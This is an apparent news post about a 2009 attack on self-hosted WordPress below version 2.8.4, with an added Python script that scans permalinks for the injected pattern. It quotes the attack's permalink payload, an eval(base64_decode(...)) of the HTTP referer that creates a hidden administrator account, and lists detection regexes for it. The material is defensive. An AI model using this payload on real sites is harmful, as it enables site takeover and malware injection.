WordPress Versions Below 2.8.4 Vulnerable – Upgrade ASAP
WordPress 2.8.4 is the current stable and secure version. If you are running an outdated, self-hosted version of WordPress, your blog is vulnerable to a new attack.
WordPress users who host their blogs on WordPress.com aren’t affected.
This new hack creates a strange permalink and a hidden Administrator account, which in turn gives access to the database.
The permalinks of a hacked blog will have extra text appended, similar to the link shown below.
example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/
This is simply code that gets evaluated and executed to create a hidden Administrator account.
It then uses JavaScript to hide itself on the user’s page and inserts spam and malware into the articles. This will in turn result in the removal of your site from Google Search results.
WordPress has advised users to upgrade to the latest version, WordPress 2.8.4, as soon as possible (ASAP) to avoid any problems.
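A check for the injected permalink pattern shown above, added here as an example (it is not code from the original post or from WordPress). The function names and the extra sample links are assumptions constructed for illustration; it decodes nested percent-encoding before matching, since the indicators are partly hidden behind escapes such as %7B and %5B.

```python
import re
from urllib.parse import quote, unquote

# Indicators taken from the injected permalink shown above.
INDICATORS = {
    "eval_call": re.compile(r"eval\s*\(", re.I),
    "base64_decode_call": re.compile(r"base64_decode\s*\(", re.I),
    "server_superglobal": re.compile(r"\$_SERVER\s*\[", re.I),
    "php_variable_expansion": re.compile(r"\$\{"),
}

def decode_layers(url, max_rounds=3):
    """Undo nested percent-encoding; invalid escapes such as '%&' are kept."""
    for _ in range(max_rounds):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return url

def find_indicators(url):
    """Return the sorted names of indicators present in a permalink."""
    text = decode_layers(url)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def scan(permalinks):
    """Map each suspicious permalink to the indicators it contains."""
    hits = {}
    for link in permalinks:
        found = find_indicators(link)
        if found:
            hits[link] = found
    return hits

# The permalink from this post, plus constructed samples.
PAGE_SAMPLE = ("example.com/category/post-title/%&(%7B$%7Beval(base64_decode"
               "($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/")
SAMPLES = [
    PAGE_SAMPLE,
    quote(PAGE_SAMPLE, safe="/"),                  # constructed: encoded once more
    "example.com/2009/09/hello-world/",            # constructed: clean permalink
    "example.com/category/evaluation-of-themes/",  # constructed: 'eval' in a slug
]

if __name__ == "__main__":
    for link, found in scan(SAMPLES).items():
        print(link, "->", ", ".join(found))
```

Feed `scan()` the permalinks your blog currently serves or the request paths from your web server logs; any hit is a reason to review the list of Administrator accounts.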
Source: Mashable

